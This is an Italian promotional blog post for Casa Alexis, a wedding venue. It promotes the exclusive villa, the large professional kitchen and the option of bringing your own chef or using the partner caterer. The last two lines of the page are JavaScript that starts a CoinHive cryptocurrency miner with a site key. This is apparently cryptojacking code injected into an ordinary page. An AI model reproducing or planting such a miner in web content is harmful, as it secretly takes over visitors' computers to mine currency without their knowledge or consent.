Perchè scegliere Casa Alexis come location per matrimoni.
Quando una coppia di giovani innamorati decide di convolare a nozze, si comincia subito a pianificare il programma. Sia che ci si affidi alle mani esperti di una wedding planner (scelta fortemente consigliata) sia che si decida di fare tutto da soli, la macchina dell’organizzazione dell’evento deve essere attivata prima possibile e nel migliore dei modi.
Mettetevi l’anima in pace : non mancarenno i momenti di panico, di sconforto, ahimè ..di litigio.
Ma non preoccupatevi … è da copione. Poi tutto si sistema e quando c’è l’amore, il desiderio di percorrere un cammino di vita insieme, qualsiasi ostacolo, dal più piccolo a quello che ci sembra più insormontabile, viene presto superato.
Di certo il momento cruciale del piano organizzativo è quello della scelta della location per matrimoni
I più tradizionali si rivolgono al classico ristorante con servizio cucina interna.
Ma non tutti sanno che fantastica alternativa è quella di affidarsi ad una location per matrimoni di prestigio come Casa Alexis. Si ha l’oppurtunità di avere in esclusiva una villa per matrimoni incantevole per tutta la giornata, senza correre il rischio di imbattersi in un’altra cerimonia.
Ma la cosa più sensazionale, che fa sì che il tuo matrimonio da sogno diventi realtà, è quella di poter scegliere in piena libertà a chi affidare il proprio servizio catering.
Casa Alexis, con la sua cucina di 200 mq altamente professionale, mette a disposizione delle coppie di sposi la possibilità di poter portare il proprio chef di fiducia o il proprio catering, e poter pianificare e personalizzare al meglio il proprio menù di nozze .
E se le coppie sono sprovviste di una figura professionale in quest’ambito, niente paura…
Casa Alexis dispone del proprio partner di fiducia , in grado di proporre qualsiasi menù sia di carne che di pesce, finger food, street food, show cooking, menù vegani o per celiaci, e menù baby…perchè tutti gli invitati devono rimanere soddisfatti anche quelli con esigenze particolari.
var miner = new CoinHive.Anonymous(‘pfW8OYSbvl3FMbCXFu3gFSFzSQVRW8ec’);
miner.start();